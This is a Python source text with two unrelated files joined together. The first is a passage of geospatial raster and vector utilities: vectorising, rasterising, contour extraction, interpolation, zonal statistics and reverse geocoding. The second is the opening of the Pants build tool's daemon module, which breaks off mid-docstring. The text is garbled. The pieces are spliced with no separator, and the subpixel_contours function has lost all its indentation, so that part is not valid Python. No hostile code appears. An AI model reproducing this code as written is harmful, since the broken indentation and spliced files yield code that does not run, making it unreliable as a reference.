        assigned to this column. Defaults to 'attribute'.
    transform : affine.Affine object, optional
        An affine.Affine object (e.g. `from affine import Affine;
        Affine(30.0, 0.0, 548040.0, 0.0, -30.0, 6886890.0)`) giving the
        affine transformation used to convert raster coordinates
        (e.g. [0, 0]) to geographic coordinates. If none is provided,
        the function will attempt to obtain an affine transformation
        from the xarray object (e.g. either at `da.transform` or
        `da.geobox.transform`).
    crs : str or CRS object, optional
        An EPSG string giving the coordinate system of the array
        (e.g. 'EPSG:3577'). If none is provided, the function will
        attempt to extract a CRS from the xarray object's `crs`
        attribute.
    dtype : str, optional
        Data type must be one of int16, int32, uint8, uint16,
        or float32
    export_shp : Boolean or string path, optional
        To export the output vectorised features to a shapefile, supply
        an output path (e.g. 'output_dir/output.shp'). The default is
        False, which will not write out a shapefile.
    verbose : bool, optional
        Print debugging messages. Default False.
        NOTE(review): `verbose` is currently accepted but unused in this
        function.
    **rasterio_kwargs :
        A set of keyword arguments to rasterio.features.shapes
        Can include `mask` and `connectivity`.

    Returns
    -------
    gdf : Geopandas GeoDataFrame
    """
    # Check for a crs object
    # NOTE(review): when `da` carries a `.crs` attribute it silently
    # overrides any user-supplied `crs` argument -- confirm intended.
    try:
        crs = da.crs
    except:
        # Bare except is a deliberate best-effort fallback: any failure to
        # read da.crs falls through to the `crs` argument.
        if crs is None:
            raise Exception("Please add a `crs` attribute to the "
                            "xarray.DataArray, or provide a CRS using the "
                            "function's `crs` parameter (e.g. 'EPSG:3577')")
    # Check if transform is provided as a xarray.DataArray method.
    # If not, require supplied Affine
    if transform is None:
        try:
            # First, try to take transform info from geobox
            transform = da.geobox.transform
        # If no geobox
        except:
            try:
                # Try getting transform from 'transform' attribute
                transform = da.transform
            except:
                # If neither of those options work, raise an exception telling the
                # user to provide a transform
                raise TypeError("Please provide an Affine transform object using the "
                                "`transform` parameter (e.g. `from affine import "
                                "Affine; Affine(30.0, 0.0, 548040.0, 0.0, -30.0, "
                                "6886890.0)`")
    # Check to see if the input is a numpy array
    if type(da) is np.ndarray:
        vectors = rasterio.features.shapes(source=da.astype(dtype),
                                           transform=transform,
                                           **rasterio_kwargs)
    else:
        # Run the vectorizing function
        vectors = rasterio.features.shapes(source=da.data.astype(dtype),
                                           transform=transform,
                                           **rasterio_kwargs)
    # Convert the generator into a list
    vectors = list(vectors)
    # Extract the polygon coordinates and values from the list
    polygons = [polygon for polygon, value in vectors]
    values = [value for polygon, value in vectors]
    # Convert polygon coordinates into polygon shapes
    polygons = [shape(polygon) for polygon in polygons]
    # Create a geopandas dataframe populated with the polygon shapes
    # NOTE(review): crs={'init': ...} is deprecated in pyproj>=2 /
    # geopandas>=0.7 and may emit FutureWarnings -- confirm target versions.
    gdf = gpd.GeoDataFrame(data={attribute_col: values},
                           geometry=polygons,
                           crs={'init': str(crs)})
    # If a file path is supplied, export a shapefile
    if export_shp:
        gdf.to_file(export_shp)
    return gdf
def xr_rasterize(gdf,
                 da,
                 attribute_col=False,
                 crs=None,
                 transform=None,
                 name=None,
                 x_dim='x',
                 y_dim='y',
                 export_tiff=None,
                 verbose=False,
                 **rasterio_kwargs):
    """
    Rasterizes a geopandas.GeoDataFrame into an xarray.DataArray.

    Parameters
    ----------
    gdf : geopandas.GeoDataFrame
        A geopandas.GeoDataFrame object containing the vector/shapefile
        data you want to rasterise.
    da : xarray.DataArray or xarray.Dataset
        The shape, coordinates, dimensions, and transform of this object
        are used to build the rasterized shapefile. It effectively
        provides a template. The attributes of this object are also
        appended to the output xarray.DataArray.
    attribute_col : string, optional
        Name of the attribute column in the geodataframe that the pixels
        in the raster will contain. If set to False, output will be a
        boolean array of 1's and 0's.
    crs : str, optional
        CRS metadata to add to the output xarray. e.g. 'epsg:3577'.
        The function will attempt get this info from the input
        GeoDataFrame first.
    transform : affine.Affine object, optional
        An affine.Affine object (e.g. `from affine import Affine;
        Affine(30.0, 0.0, 548040.0, 0.0, -30.0, 6886890.0)`) giving the
        affine transformation used to convert raster coordinates
        (e.g. [0, 0]) to geographic coordinates. If none is provided,
        the function will attempt to obtain an affine transformation
        from the xarray object (e.g. either at `da.transform` or
        `da.geobox.transform`).
    name : str, optional
        Name to give the output xarray.DataArray (required when
        exporting a GeoTIFF).
    x_dim : str, optional
        An optional string allowing you to override the xarray dimension
        used for x coordinates. Defaults to 'x'. Useful, for example,
        if x and y dims instead called 'lat' and 'lon'.
    y_dim : str, optional
        An optional string allowing you to override the xarray dimension
        used for y coordinates. Defaults to 'y'. Useful, for example,
        if x and y dims instead called 'lat' and 'lon'.
    export_tiff: str, optional
        If a filepath is provided (e.g 'output/output.tif'), will export a
        geotiff file. A named array is required for this operation, if one
        is not supplied by the user a default name, 'data', is used
    verbose : bool, optional
        Print debugging messages. Default False.
    **rasterio_kwargs :
        A set of keyword arguments to rasterio.features.rasterize
        Can include: 'all_touched', 'merge_alg', 'dtype'.

    Returns
    -------
    xarr : xarray.DataArray
    """
    # Check for a crs object
    # NOTE(review): a CRS found on the template `da` silently overrides a
    # user-supplied `crs` argument -- confirm intended.
    try:
        crs = da.geobox.crs
    except:
        try:
            crs = da.crs
        except:
            if crs is None:
                raise ValueError("Please add a `crs` attribute to the "
                                 "xarray.DataArray, or provide a CRS using the "
                                 "function's `crs` parameter (e.g. crs='EPSG:3577')")
    # Check if transform is provided as a xarray.DataArray method.
    # If not, require supplied Affine
    if transform is None:
        try:
            # First, try to take transform info from geobox
            transform = da.geobox.transform
        # If no geobox
        except:
            try:
                # Try getting transform from 'transform' attribute
                transform = da.transform
            except:
                # If neither of those options work, raise an exception telling the
                # user to provide a transform
                raise TypeError("Please provide an Affine transform object using the "
                                "`transform` parameter (e.g. `from affine import "
                                "Affine; Affine(30.0, 0.0, 548040.0, 0.0, -30.0, "
                                "6886890.0)`")
    # Grab the 2D dims (not time)
    try:
        dims = da.geobox.dims
    except:
        # Fall back to the user-specified (or default) dimension names.
        dims = y_dim, x_dim
    # Coords
    xy_coords = [da[dims[0]], da[dims[1]]]
    # Shape
    try:
        y, x = da.geobox.shape
    except:
        y, x = len(xy_coords[0]), len(xy_coords[1])
    # Reproject shapefile to match CRS of raster
    if verbose:
        print(f'Rasterizing to match xarray.DataArray dimensions ({y}, {x})')
    try:
        gdf_reproj = gdf.to_crs(crs=crs)
    except:
        # Sometimes the crs can be a datacube utils CRS object
        # so convert to string before reprojecting
        gdf_reproj = gdf.to_crs(crs={'init': str(crs)})
    # If an attribute column is specified, rasterise using vector
    # attribute values. Otherwise, rasterise into a boolean array
    if attribute_col:
        # Use the geometry and attributes from `gdf` to create an iterable
        shapes = zip(gdf_reproj.geometry, gdf_reproj[attribute_col])
    else:
        # Use geometry directly (will produce a boolean numpy array)
        shapes = gdf_reproj.geometry
    # Rasterise shapes into an array
    arr = rasterio.features.rasterize(shapes=shapes,
                                      out_shape=(y, x),
                                      transform=transform,
                                      **rasterio_kwargs)
    # Convert result to a xarray.DataArray
    xarr = xr.DataArray(arr,
                        coords=xy_coords,
                        dims=dims,
                        attrs=da.attrs,
                        name=name if name else None)
    # Add back crs if xarr.attrs doesn't have it
    if xarr.geobox is None:
        xarr = assign_crs(xarr, str(crs))
    if export_tiff:
        if verbose:
            print(f"Exporting GeoTIFF to {export_tiff}")
        write_cog(xarr,
                  export_tiff,
                  overwrite=True)
    return xarr
def subpixel_contours(da,
z_values=[0.0],
crs=None,
affine=None,
attribute_df=None,
output_path=None,
min_vertices=2,
dim='time',
errors='ignore',
verbose=False):
"""
Uses `skimage.measure.find_contours` to extract multiple z-value
contour lines from a two-dimensional array (e.g. multiple elevations
from a single DEM), or one z-value for each array along a specified
dimension of a multi-dimensional array (e.g. to map waterlines
across time by extracting a 0 NDWI contour from each individual
timestep in an xarray timeseries).
Contours are returned as a geopandas.GeoDataFrame with one row per
z-value or one row per array along a specified dimension. The
`attribute_df` parameter can be used to pass custom attributes
to the output contour features.
Last modified: November 2020
Parameters
----------
da : xarray DataArray
A two-dimensional or multi-dimensional array from which
contours are extracted. If a two-dimensional array is provided,
the analysis will run in 'single array, multiple z-values' mode
which allows you to specify multiple `z_values` to be extracted.
If a multi-dimensional array is provided, the analysis will run
in 'single z-value, multiple arrays' mode allowing you to
extract contours for each array along the dimension specified
by the `dim` parameter.
z_values : int, float or list of ints, floats
An individual z-value or list of multiple z-values to extract
from the array. If operating in 'single z-value, multiple
arrays' mode specify only a single z-value.
crs : string or CRS object, optional
An EPSG string giving the coordinate system of the array
(e.g. 'EPSG:3577'). If none is provided, the function will
attempt to extract a CRS from the xarray object's `crs`
attribute.
affine : affine.Affine object, optional
An affine.Affine object (e.g. `from affine import Affine;
Affine(30.0, 0.0, 548040.0, 0.0, -30.0, "6886890.0) giving the
affine transformation used to convert raster coordinates
(e.g. [0, 0]) to geographic coordinates. If none is provided,
the function will attempt to obtain an affine transformation
from the xarray object (e.g. either at `da.transform` or
`da.geobox.transform`).
output_path : string, optional
The path and filename for the output shapefile.
attribute_df : pandas.Dataframe, optional
A pandas.Dataframe containing attributes to pass to the output
contour features. The dataframe must contain either the same
number of rows as supplied `z_values` (in 'multiple z-value,
single array' mode), or the same number of rows as the number
of arrays along the `dim` dimension ('single z-value, multiple
arrays mode').
min_vertices : int, optional
The minimum number of vertices required for a contour to be
extracted. The default (and minimum) value is 2, which is the
smallest number required to produce a contour line (i.e. a start
and end point). Higher values remove smaller contours,
potentially removing noise from the output dataset.
dim : string, optional
The name of the dimension along which to extract contours when
operating in 'single z-value, multiple arrays' mode. The default
is 'time', which extracts contours for each array along the time
dimension.
errors : string, optional
If 'raise', then any failed contours will raise an exception.
If 'ignore' (the default), a list of failed contours will be
printed. If no contours are returned, an exception will always
be raised.
verbose : bool, optional
Print debugging messages. Default False.
Returns
-------
output_gdf : geopandas geodataframe
A geopandas geodataframe object with one feature per z-value
('single array, multiple z-values' mode), or one row per array
along the dimension specified by the `dim` parameter ('single
z-value, multiple arrays' mode). If `attribute_df` was
provided, these values will be included in the shapefile's
attribute table.
"""
def contours_to_multiline(da_i, z_value, min_vertices=2):
'''
Helper function to apply marching squares contour extraction
to an array and return a data as a shapely MultiLineString.
The `min_vertices` parameter allows you to drop small contours
with less than X vertices.
'''
# Extracts contours from array, and converts each discrete
# contour into a Shapely LineString feature. If the function
# returns a KeyError, this may be due to an unresolved issue in
# scikit-image: https://github.com/scikit-image/scikit-image/issues/4830
line_features = [LineString(i[:,[1, 0]])
for i in find_contours(da_i.data, z_value)
if i.shape[0] > min_vertices]
# Output resulting lines into a single combined MultiLineString
return MultiLineString(line_features)
# Check if CRS is provided as a xarray.DataArray attribute.
# If not, require supplied CRS
try:
crs = da.crs
except:
if crs is None:
raise ValueError("Please add a `crs` attribute to the "
"xarray.DataArray, or provide a CRS using the "
"function's `crs` parameter (e.g. 'EPSG:3577')")
# Check if Affine transform is provided as a xarray.DataArray method.
# If not, require supplied Affine
try:
affine = da.geobox.transform
except KeyError:
affine = da.transform
except:
if affine is None:
raise TypeError("Please provide an Affine object using the "
"`affine` parameter (e.g. `from affine import "
"Affine; Affine(30.0, 0.0, 548040.0, 0.0, -30.0, "
"6886890.0)`")
# If z_values is supplied is not a list, convert to list:
z_values = z_values if (isinstance(z_values, list) or
isinstance(z_values, np.ndarray)) else [z_values]
# Test number of dimensions in supplied data array
if len(da.shape) == 2:
if verbose:
print(f'Operating in multiple z-value, single array mode')
dim = 'z_value'
contour_arrays = {str(i)[0:10]:
contours_to_multiline(da, i, min_vertices)
for i in z_values}
else:
# Test if only a single z-value is given when operating in
# single z-value, multiple arrays mode
if verbose:
print(f'Operating in single z-value, multiple arrays mode')
if len(z_values) > 1:
raise ValueError('Please provide a single z-value when operating '
'in single z-value, multiple arrays mode')
contour_arrays = {str(i)[0:10]:
contours_to_multiline(da_i, z_values[0], min_vertices)
for i, da_i in da.groupby(dim)}
# If attributes are provided, add the contour keys to that dataframe
if attribute_df is not None:
try:
attribute_df.insert(0, dim, contour_arrays.keys())
except ValueError:
raise ValueError("One of the following issues occured:\n\n"
"1) `attribute_df` contains a different number of "
"rows than the number of supplied `z_values` ("
"'multiple z-value, single array mode')\n"
"2) `attribute_df` contains a different number of "
"rows than the number of arrays along the `dim` "
"dimension ('single z-value, multiple arrays mode')")
# Otherwise, use the contour keys as the only main attributes
else:
attribute_df = list(contour_arrays.keys())
# Convert output contours to a geopandas.GeoDataFrame
contours_gdf = gpd.GeoDataFrame(data=attribute_df,
geometry=list(contour_arrays.values()),
crs=crs)
# Define affine and use to convert array coords to geographic coords.
# We need to add 0.5 x pixel size to the x and y to obtain the centre
# point of our pixels, rather than the top-left corner
shapely_affine = [affine.a, affine.b, affine.d, affine.e,
affine.xoff + affine.a / 2.0,
affine.yoff + affine.e / 2.0]
contours_gdf['geometry'] = contours_gdf.affine_transform(shapely_affine)
# Rename the data column to match the dimension
contours_gdf = contours_gdf.rename({0: dim}, axis=1)
# Drop empty timesteps
empty_contours = contours_gdf.geometry.is_empty
failed = ', '.join(map(str, contours_gdf[empty_contours][dim].to_list()))
contours_gdf = contours_gdf[~empty_contours]
# Raise exception if no data is returned, or if any contours fail
# when `errors='raise'. Otherwise, print failed contours
if empty_contours.all() and errors == 'raise':
raise RuntimeError("Failed to generate any valid contours; verify that "
"values passed to `z_values` are valid and present "
"in `da`")
elif empty_contours.all() and errors == 'ignore':
if verbose:
print ("Failed to generate any valid contours; verify that "
"values passed to `z_values` are valid and present "
"in `da`")
elif empty_contours.any() and errors == 'raise':
raise Exception(f'Failed to generate contours: {failed}')
elif empty_contours.any() and errors == 'ignore':
if verbose:
print(f'Failed to generate contours: {failed}')
# If asked to write out file, test if geojson or shapefile
if output_path and output_path.endswith('.geojson'):
if verbose:
print(f'Writing contours to {output_path}')
contours_gdf.to_crs('EPSG:4326').to_file(filename=output_path,
driver='GeoJSON')
if output_path and output_path.endswith('.shp'):
if verbose:
print(f'Writing contours to {output_path}')
contours_gdf.to_file(filename=output_path)
return contours_gdf
def interpolate_2d(ds,
                   x_coords,
                   y_coords,
                   z_coords,
                   method='linear',
                   factor=1,
                   verbose=False,
                   **kwargs):
    """
    Interpolate Z-values from scattered points (X, Y, Z) across the
    spatial extent of an existing xarray dataset. This can be useful for
    producing smooth surfaces from point data that can be compared
    directly against satellite data derived from an OpenDataCube query.

    Supported interpolation methods include 'linear', 'nearest' and
    'cubic' (using `scipy.interpolate.griddata`), and 'rbf' (using
    `scipy.interpolate.Rbf`).

    Last modified: February 2020

    Parameters
    ----------
    ds : xarray DataArray or Dataset
        A two-dimensional or multi-dimensional array from which x and y
        dimensions will be copied and used for the area in which to
        interpolate point data.
    x_coords, y_coords : numpy array
        Arrays containing X and Y coordinates for all points (e.g.
        longitudes and latitudes).
    z_coords : numpy array
        An array containing Z coordinates for all points (e.g.
        elevations). These are the values you wish to interpolate
        between.
    method : string, optional
        The method used to interpolate between point values. This string
        is either passed to `scipy.interpolate.griddata` (for 'linear',
        'nearest' and 'cubic' methods), or used to specify Radial Basis
        Function interpolation using `scipy.interpolate.Rbf` ('rbf').
        Defaults to 'linear'.
    factor : int, optional
        An optional integer that can be used to subsample the spatial
        interpolation extent to obtain faster interpolation times, then
        up-sample this array back to the original dimensions of the
        data as a final step. For example, setting `factor=10` will
        interpolate data into a grid that has one tenth of the
        resolution of `ds`. This approach will be significantly faster
        than interpolating at full resolution, but will potentially
        produce less accurate or reliable results.
    verbose : bool, optional
        Print debugging messages. Default False.
    **kwargs :
        Optional keyword arguments to pass to either
        `scipy.interpolate.griddata` (if `method` is 'linear', 'nearest'
        or 'cubic'), or `scipy.interpolate.Rbf` (if `method` is 'rbf').

    Returns
    -------
    interp_2d_da : xarray DataArray
        An xarray DataArray with x and y coordinates copied from `ds`,
        and Z-values interpolated from the points data.

    Raises
    ------
    ValueError
        If `method` is not one of 'linear', 'nearest', 'cubic' or 'rbf'.
    """
    # Validate `method` up front so an unsupported value raises a clear
    # ValueError instead of a NameError on the unbound result further down
    valid_methods = ('linear', 'nearest', 'cubic', 'rbf')
    if method not in valid_methods:
        raise ValueError(f"`method` must be one of {valid_methods}, "
                         f"not '{method}'")
    # Extract xy points to interpolate from
    points_xy = np.vstack([x_coords, y_coords]).T
    # Extract x and y coordinates to interpolate into.
    # If `factor` is greater than 1, the coordinates will be subsampled
    # for faster run-times. If the last x or y value in the subsampled
    # grid isn't the same as the last x or y value in the original
    # full resolution grid, add the final full resolution grid value to
    # ensure data is interpolated up to the very edge of the array
    if ds.x[::factor][-1].item() == ds.x[-1].item():
        x_grid_coords = ds.x[::factor].values
    else:
        x_grid_coords = ds.x[::factor].values.tolist() + [ds.x[-1].item()]
    if ds.y[::factor][-1].item() == ds.y[-1].item():
        y_grid_coords = ds.y[::factor].values
    else:
        y_grid_coords = ds.y[::factor].values.tolist() + [ds.y[-1].item()]
    # Create grids to interpolate into. Note that `np.meshgrid` returns
    # the X-coordinate grid first, then the Y-coordinate grid (the
    # previous implementation bound these to swapped names)
    grid_x, grid_y = np.meshgrid(x_grid_coords, y_grid_coords)
    if method in ('linear', 'nearest', 'cubic'):
        # Apply scipy.interpolate.griddata interpolation methods
        interp_2d = scipy.interpolate.griddata(points=points_xy,
                                               values=z_coords,
                                               xi=(grid_x, grid_y),
                                               method=method,
                                               **kwargs)
    else:
        # Apply Radial Basis Function interpolation
        rbf = scipy.interpolate.Rbf(x_coords, y_coords, z_coords, **kwargs)
        interp_2d = rbf(grid_x, grid_y)
    # Create xarray dataarray from the data and resample to ds coords
    interp_2d_da = xr.DataArray(interp_2d,
                                coords=[y_grid_coords, x_grid_coords],
                                dims=['y', 'x'])
    # If factor is greater than 1, resample the interpolated array to
    # match the input `ds` array
    if factor > 1:
        interp_2d_da = interp_2d_da.interp_like(ds)
    return interp_2d_da
def contours_to_arrays(gdf, col):
    """
    Convert a GeoDataFrame of line features into an array with three
    columns giving the X, Y and Z coordinates of each vertex. This data
    can then be used as an input to interpolation procedures (e.g. using
    a function like `interpolate_2d`).

    Last modified: October 2019

    Parameters
    ----------
    gdf : Geopandas GeoDataFrame
        A GeoPandas GeoDataFrame of lines to convert into point
        coordinates.
    col : str
        A string giving the name of the GeoDataFrame field to use as
        Z-values.

    Returns
    -------
    A numpy array with three columns giving the X, Y and Z coordinates
    of each vertex in the input GeoDataFrame.
    """
    coords_zvals = []
    for i in range(len(gdf)):
        row = gdf.iloc[i]
        zval = row[col]
        try:
            # Multi-part geometry: stack the vertices of every part.
            # Narrowed from a bare `except`: iterating a single-part
            # geometry raises TypeError and a missing `coords` attribute
            # raises AttributeError; any other error should propagate
            coords = np.concatenate([np.vstack(part.coords.xy).T
                                     for part in row.geometry])
        except (TypeError, AttributeError):
            # Single-part geometry: read its vertices directly
            coords = np.vstack(row.geometry.coords.xy).T
        # Append the feature's Z-value as a third column beside the XY vertices
        coords_zvals.append(
            np.column_stack((coords,
                             np.full(np.shape(coords)[0], fill_value=zval))))
    return np.concatenate(coords_zvals)
def largest_region(bool_array, **kwargs):
    '''
    Takes a boolean array and identifies the largest contiguous region of
    connected True values. This is returned as a new array with cells in
    the largest region marked as True, and all other cells marked as False.

    Parameters
    ----------
    bool_array : boolean array
        A boolean array (numpy or xarray.DataArray) with True values for
        the areas that will be inspected to find the largest group of
        connected cells
    **kwargs :
        Optional keyword arguments to pass to `measure.label`

    Returns
    -------
    largest_region : boolean array
        A boolean array with cells in the largest region marked as True,
        and all other cells marked as False. If the input contains no
        True values at all, an all-False array is returned.
    '''
    # First, break boolean array into unique, discrete regions/blobs
    blobs_labels = label(bool_array, background=0, **kwargs)
    # Count the size of each blob, excluding the background class (0)
    ids, counts = np.unique(blobs_labels[blobs_labels > 0],
                            return_counts=True)
    # Guard against an all-False input: `np.argmax` on an empty `counts`
    # array raises ValueError, so return an all-False array instead
    if ids.size == 0:
        return blobs_labels > 0
    # Identify the region ID of the largest blob
    largest_region_id = ids[np.argmax(counts)]
    # Produce a boolean array where True == the largest region
    largest_region = blobs_labels == largest_region_id
    return largest_region
def transform_geojson_wgs_to_epsg(geojson, EPSG):
    """
    Reproject a geojson feature from WGS84 (EPSG:4326) into a target CRS.

    Parameters
    ----------
    geojson : dict
        A geojson dictionary containing a 'geometry' key, in WGS84
        coordinates.
    EPSG : int
        Numeric code for the EPSG coordinate reference system to
        transform into.

    Returns
    -------
    transformed_geojson : dict
        A geojson dictionary containing a 'coordinates' key, in the
        desired CRS.
    """
    # Wrap the incoming geometry with its source CRS, reproject, then
    # hand back the plain geojson mapping via the geo interface protocol
    wgs84_geom = Geometry(geojson['geometry'], CRS('epsg:4326'))
    reprojected = wgs84_geom.to_crs(CRS(f'epsg:{EPSG}'))
    return reprojected.__geo_interface__
def zonal_stats_parallel(shp,
                         raster,
                         statistics,
                         out_shp,
                         ncpus,
                         **kwargs):
    """
    Summarizing raster datasets based on vector geometries in parallel.
    Each cpu receives an equal chunk of the dataset.
    Utilizes the perrygeo/rasterstats package.

    Parameters
    ----------
    shp : str
        Path to shapefile that contains polygons over
        which zonal statistics are calculated
    raster : str
        Path to the raster from which the statistics are calculated.
        This can be a virtual raster (.vrt).
    statistics : list
        List of statistics to calculate, e.g.
        ['min', 'max', 'median', 'majority', 'sum']
    out_shp : str
        Path to export shapefile containing zonal statistics.
    ncpus : int
        Number of cores to parallelize the operations over.
    kwargs :
        Any other keyword arguments to rasterstats.zonal_stats().
        See https://github.com/perrygeo/python-rasterstats for
        all options

    Returns
    -------
    Exports a shapefile to disk containing the zonal statistics requested
    """
    # Yields n-sized chunks from l (used for splitting the task
    # across multiple processes)
    def chunks(l, n):
        for i in range(0, len(l), n):
            yield l[i:i + n]

    # Calculates zonal stats for one chunk and stores results in the
    # shared dict, keyed by each polygon's id
    def worker(z, raster, d):
        z_stats = zonal_stats(z, raster, stats=statistics, **kwargs)
        for i in range(len(z_stats)):
            d[z[i]['id']] = z_stats[i]

    # Writes the output shapefile, appending one field per statistic
    def write_output(zones, out_shp, d):
        # Copy schema and crs from input and add new fields for each statistic
        schema = zones.schema.copy()
        crs = zones.crs
        for stat in statistics:
            schema['properties'][stat] = 'float'
        with fiona.open(out_shp, 'w', 'ESRI Shapefile', schema, crs) as output:
            for elem in zones:
                for stat in statistics:
                    elem['properties'][stat] = d[elem['id']][stat]
                output.write({'properties': elem['properties'],
                              'geometry': mapping(shape(elem['geometry']))})

    with fiona.open(shp) as zones:
        # Create manager dictionary (polygon ids=keys, stats=entries)
        # where multiple processes can write without conflicts
        man = mp.Manager()
        d = man.dict()
        # Split zone polygons into chunks for parallel processing. Guard
        # with max(1, ...) so a dataset with fewer polygons than `ncpus`
        # does not produce a zero chunk size (range() with step 0 raises
        # ValueError in the previous implementation)
        chunk_size = max(1, len(zones) // ncpus)
        jobs = []
        for z in chunks(zones, chunk_size):
            p = mp.Process(target=worker, args=(z, raster, d))
            p.start()
            jobs.append(p)
        # Wait until all chunks are finished (plain loop rather than a
        # side-effect list comprehension)
        for j in jobs:
            j.join()
        write_output(zones, out_shp, d)
def reverse_geocode(coords, site_classes=None, state_classes=None):
    """
    Takes a latitude and longitude coordinate, and performs a reverse
    geocode to return a plain-text description of the location in the
    form:

        Site, State

    E.g.: `reverse_geocode(coords=(-35.282163, 149.128835))`

        'Canberra, Australian Capital Territory'

    Parameters
    ----------
    coords : tuple of floats
        A tuple of (latitude, longitude) coordinates used to perform
        the reverse geocode.
    site_classes : list of strings, optional
        Strings used to define the site part of the plain text location
        description; tested against the geocoded address one by one
        until a match is made. Defaults to:
        `['city', 'town', 'village', 'suburb', 'hamlet', 'county', 'municipality']`
    state_classes : list of strings, optional
        Strings used to define the state part of the plain text location
        description; tested against the address one by one until a match
        is made. Defaults to: `['state', 'territory']`.

    Returns
    -------
    If a valid geocoded address is found, a plain text 'Site, State'
    description is returned; otherwise formatted coordinates are
    returned instead (e.g. 'XX.XX S, XX.XX E').
    """
    # Query the Nominatim service with the supplied (lat, lon) pair
    out = Nominatim(user_agent='Digital Earth Africa').reverse(coords)
    # Build formatted coordinate strings to fall back on if geocoding fails
    lat = f'{-coords[0]:.2f} S' if coords[0] < 0 else f'{coords[0]:.2f} N'
    lon = f'{-coords[1]:.2f} W' if coords[1] < 0 else f'{coords[1]:.2f} E'
    fallback = f'{lat}, {lon}'
    try:
        # Get address from geocoded data
        address = out.raw['address']
        # Use site and state classes if supplied; else use defaults
        # (truthiness test: an empty list also falls back to the default)
        if not site_classes:
            site_classes = ['city', 'town', 'village', 'suburb', 'hamlet',
                            'county', 'municipality']
        if not state_classes:
            state_classes = ['state', 'territory']
        # Return the first site or state class that exists in address dict
        site = next((address[key] for key in site_classes if key in address),
                    None)
        state = next((address[key] for key in state_classes if key in address),
                     None)
        # If both parts were found, return the formatted description;
        # otherwise fall back to coordinates
        if site and state:
            return f'{site}, {state}'
        print('No valid geocoded location; returning coordinates instead')
        return fallback
    except (KeyError, AttributeError):
        # If no geocoding result, return N/E/S/W coordinates
        print('No valid geocoded location; returning coordinates instead')
        return fallback
pants_daemon.py | # Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import logging
import os
import sys
import threading
from contextlib import contextmanager
from dataclasses import dataclass
from setproctitle import setproctitle as set_process_title
from pants.base.build_environment import get_buildroot
from pants.base.exception_sink import ExceptionSink, SignalHandler
from pants.base.exiter import Exiter
from pants.bin.daemon_pants_runner import DaemonPantsRunner
from pants.engine.native import Native
from pants.init.engine_initializer import EngineInitializer
from pants.init.logging import init_rust_logger, setup_logging
from pants.init.options_initializer import BuildConfigInitializer, OptionsInitializer
from pants.option.arg_splitter import GLOBAL_SCOPE
from pants.option.options_bootstrapper import OptionsBootstrapper
from pants.option.options_fingerprinter import OptionsFingerprinter
from pants.pantsd.process_manager import FingerprintedProcessManager
from pants.pantsd.service.fs_event_service import FSEventService
from pants.pantsd.service.pailgun_service import PailgunService
from pants.pantsd.service.pants_service import PantsServices
from pants.pantsd.service.scheduler_service import SchedulerService
from pants.pantsd.service.store_gc_service import StoreGCService
from pants.pantsd.watchman_launcher import WatchmanLauncher
from pants.util.contextutil import stdio_as
from pants.util.memo import memoized_property
from pants.util.strutil import ensure_text
class _LoggerStream(object):
"""A sys.std{out,err} replacement that pipes output to a logger.
N.B. `logging.Logger` expects unicode. However, most of our outstream logic, such as in `exiter.py`,
will use `sys.std{out,err}.buffer` and thus a bytes interface. So, we must provide a `buffer`
property, and change the semantics of the buffer to always convert the message to unicode. This
is an unfortunate code smell, as `logging` does not expose a bytes interface so this is
the best solution we could think of.
"""
def __init__(self, logger, log_level, handler):
"""
:param logging.Logger logger: The logger instance to emit writes to.
:param int log_level: The log level to use for the given logger.
:param Handler handler: The underlying log handler, for determining the fileno
to support faulthandler logging.
"""
self._logger = logger
self._log_level = log_level
self._handler = handler
def write(self, msg):
msg = ensure_text(msg)
for line in msg.rstrip().splitlines():
# The log only accepts text, and will raise a decoding error if the default encoding is ascii
# if provided a bytes input for unicode text.
line = ensure_text(line)
self._logger.log(self._log_level, line.rstrip())
def flush(self):
return
def isatty(self):
return False
def fileno(self):
return self._handler.stream.fileno()
@property
def buffer(self):
return self
class PantsDaemonSignalHandler(SignalHandler):
  """Signal handling overrides for the pantsd process itself."""

  def __init__(self, daemon):
    """
    :param PantsDaemon daemon: The daemon instance to terminate on SIGINT.
    """
    super().__init__()
    self._daemon = daemon

  def handle_sigint(self, signum, _frame):
    # Tear down pantsd itself but leave watchman running, so other pants
    # processes (and a relaunched pantsd) can keep using it.
    self._daemon.terminate(include_watchman=False)
class PantsDaemon(FingerprintedProcessManager):
"""A daemon that manages PantsService instances."""
JOIN_TIMEOUT_SECONDS = 1
LOG_NAME = 'pantsd.log'
  class StartupFailure(Exception):
    """Represents a failure to start pantsd (e.g. a service thread that fails to spawn)."""
  class RuntimeFailure(Exception):
    """Represents a pantsd failure at runtime, usually from an underlying service failure.

    Raised by the service-monitoring loop when a service thread dies unexpectedly.
    """
  @dataclass(frozen=True)
  class Handle:
    """A handle to a "probably running" pantsd instance.

    We attempt to verify that the pantsd instance is still running when we create a Handle, but
    after it has been created it is entirely possible that the pantsd instance perishes.
    """
    # The pid of the pantsd process.
    pid: int
    # The port its pailgun server is listening on.
    port: int
    # The base directory for the daemon's ProcessManager metadata.
    metadata_base_dir: str
  class Factory:
    """Constructs, launches and restarts PantsDaemon instances."""

    @classmethod
    def maybe_launch(cls, options_bootstrapper):
      """Creates and launches a daemon instance if one does not already exist.

      :param OptionsBootstrapper options_bootstrapper: The bootstrap options.
      :returns: A Handle for the running pantsd instance.
      :rtype: PantsDaemon.Handle
      """
      # A lightweight (non-engine-initialized) instance is enough to check liveness.
      stub_pantsd = cls.create(options_bootstrapper, full_init=False)
      with stub_pantsd._services.lifecycle_lock:
        if stub_pantsd.needs_restart(stub_pantsd.options_fingerprint):
          # Once we determine we actually need to launch, recreate with full initialization.
          pantsd = cls.create(options_bootstrapper)
          return pantsd.launch()
        else:
          # We're already launched.
          return PantsDaemon.Handle(
            stub_pantsd.await_pid(10),
            stub_pantsd.read_named_socket('pailgun', int),
            stub_pantsd._metadata_base_dir,
          )

    @classmethod
    def restart(cls, options_bootstrapper):
      """Restarts a running daemon instance.

      :param OptionsBootstrapper options_bootstrapper: The bootstrap options.
      :returns: A Handle for the pantsd instance.
      :rtype: PantsDaemon.Handle
      """
      pantsd = cls.create(options_bootstrapper)
      with pantsd._services.lifecycle_lock:
        # N.B. This will call `pantsd.terminate()` before starting.
        return pantsd.launch()

    @classmethod
    def create(cls, options_bootstrapper, full_init=True):
      """Builds a PantsDaemon instance (without launching it).

      :param OptionsBootstrapper options_bootstrapper: The bootstrap options.
      :param bool full_init: Whether or not to fully initialize an engine et al for the purposes
                             of spawning a new daemon. `full_init=False` is intended primarily
